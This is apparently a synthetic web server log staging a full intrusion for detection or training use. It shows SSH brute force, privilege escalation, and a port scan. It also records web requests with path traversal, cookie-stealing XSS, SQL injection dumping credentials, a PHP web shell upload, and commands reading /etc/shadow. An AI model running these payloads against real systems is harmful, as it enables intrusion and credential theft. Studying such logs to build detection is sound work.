sample-attack.log
39 lines (39 loc) · 4.14 KB
Mar 5 02:14:01 webserver CRON[4521]: (root) CMD (/usr/lib/nagios/plugins/check_disk -w 20% -c 10%)
Mar 5 02:14:03 webserver sshd[8841]: Accepted publickey for admin from 10.0.1.50 port 52100 ssh2
Mar 5 02:15:22 webserver sshd[9102]: Failed password for root from 203.0.113.42 port 44312 ssh2
Mar 5 02:15:24 webserver sshd[9102]: Failed password for root from 203.0.113.42 port 44312 ssh2
Mar 5 02:15:25 webserver sshd[9102]: Failed password for root from 203.0.113.42 port 44312 ssh2
Mar 5 02:15:27 webserver sshd[9102]: Failed password for root from 203.0.113.42 port 44312 ssh2
Mar 5 02:15:28 webserver sshd[9102]: Failed password for root from 203.0.113.42 port 44312 ssh2
Mar 5 02:15:30 webserver sshd[9103]: Failed password for invalid user admin from 203.0.113.42 port 44580 ssh2
Mar 5 02:15:31 webserver sshd[9103]: Failed password for invalid user admin from 203.0.113.42 port 44580 ssh2
Mar 5 02:15:33 webserver sshd[9104]: Failed password for invalid user test from 203.0.113.42 port 44821 ssh2
Mar 5 02:15:45 webserver sshd[9105]: Accepted password for www-data from 203.0.113.42 port 45001 ssh2
Mar 5 02:15:47 webserver sudo: www-data : TTY=pts/2 ; PWD=/tmp ; USER=root ; COMMAND=/bin/bash
Mar 5 02:15:48 webserver su[9201]: pam_unix(su:session): session opened for user root by www-data(uid=33)
Mar 5 02:16:01 webserver kernel: [45821.332] TCP: Possible SYN flooding on port 443. Sending cookies.
Mar 5 02:16:15 webserver kernel: [45835.112] Firewall: DROP IN=eth0 OUT= SRC=198.51.100.23 DST=10.0.1.20 PROTO=TCP DPT=22
Mar 5 02:16:22 webserver kernel: [45842.001] Firewall: DROP IN=eth0 OUT= SRC=198.51.100.23 DST=10.0.1.20 PROTO=TCP DPT=23
Mar 5 02:16:23 webserver kernel: [45843.102] Firewall: DROP IN=eth0 OUT= SRC=198.51.100.23 DST=10.0.1.20 PROTO=TCP DPT=80
Mar 5 02:16:24 webserver kernel: [45844.203] Firewall: DROP IN=eth0 OUT= SRC=198.51.100.23 DST=10.0.1.20 PROTO=TCP DPT=443
Mar 5 02:16:25 webserver kernel: [45845.304] Firewall: DROP IN=eth0 OUT= SRC=198.51.100.23 DST=10.0.1.20 PROTO=TCP DPT=3306
Mar 5 02:16:26 webserver kernel: [45846.405] Firewall: DROP IN=eth0 OUT= SRC=198.51.100.23 DST=10.0.1.20 PROTO=TCP DPT=8080
203.0.113.42 - - [05/Mar/2026:02:17:01 +0000] "GET /admin/login.php HTTP/1.1" 200 4521
203.0.113.42 - - [05/Mar/2026:02:17:05 +0000] "POST /admin/login.php HTTP/1.1" 302 0
203.0.113.42 - - [05/Mar/2026:02:17:08 +0000] "GET /admin/../../../etc/passwd HTTP/1.1" 400 299
203.0.113.42 - - [05/Mar/2026:02:17:10 +0000] "GET /search?q=<script>alert(document.cookie)</script> HTTP/1.1" 200 8192
203.0.113.42 - - [05/Mar/2026:02:17:12 +0000] "GET /products?id=1'+OR+1=1--+ HTTP/1.1" 200 15823
203.0.113.42 - - [05/Mar/2026:02:17:15 +0000] "GET /products?id=1+UNION+SELECT+username,password+FROM+users-- HTTP/1.1" 200 982
203.0.113.42 - - [05/Mar/2026:02:17:18 +0000] "POST /upload.php HTTP/1.1" 200 48 "<?php system($_GET['cmd']); ?>"
203.0.113.42 - - [05/Mar/2026:02:17:22 +0000] "GET /uploads/shell.php?cmd=id HTTP/1.1" 200 32
203.0.113.42 - - [05/Mar/2026:02:17:25 +0000] "GET /uploads/shell.php?cmd=cat+/etc/shadow HTTP/1.1" 200 1520
Mar 5 02:17:30 webserver kernel: [45910.882] audit: type=1400 msg=audit(1741140050.882:412): operation="exec" pid=9312 comm="bash" name="/dev/shm/.x" requested_mask="x"
Mar 5 02:17:32 webserver crontab[9315]: (www-data) REPLACE (www-data) crontab entry modified
Mar 5 02:17:35 webserver kernel: [45915.201] process 9320 (kworker/u:0) attempted to connect to 192.0.2.99:4444
Mar 5 02:17:38 webserver sshd[9325]: reverse mapping checking getaddrinfo for 42-113-0-203.dynamic.example.com [203.0.113.42] failed
Mar 5 02:17:40 webserver named[1201]: client 203.0.113.42#53491: query (cache) 'evil.c2server.xyz/A/IN' denied
Mar 5 02:17:45 webserver kernel: [45925.551] Out of memory: Kill process 3122 (mysqld) score 901 or sacrifice child
Mar 5 02:17:50 webserver postfix/smtpd[9401]: NOQUEUE: reject: RCPT from unknown[203.0.113.42]: 554 Relay access denied
Mar 5 02:18:01 webserver systemd[1]: Starting Daily apt upgrade and clean activities...
Mar 5 02:18:15 webserver systemd[1]: Started Daily apt upgrade and clean activities.
Mar 5 02:18:30 webserver sshd[9501]: Received disconnect from 10.0.1.50 port 52100:11: disconnected by user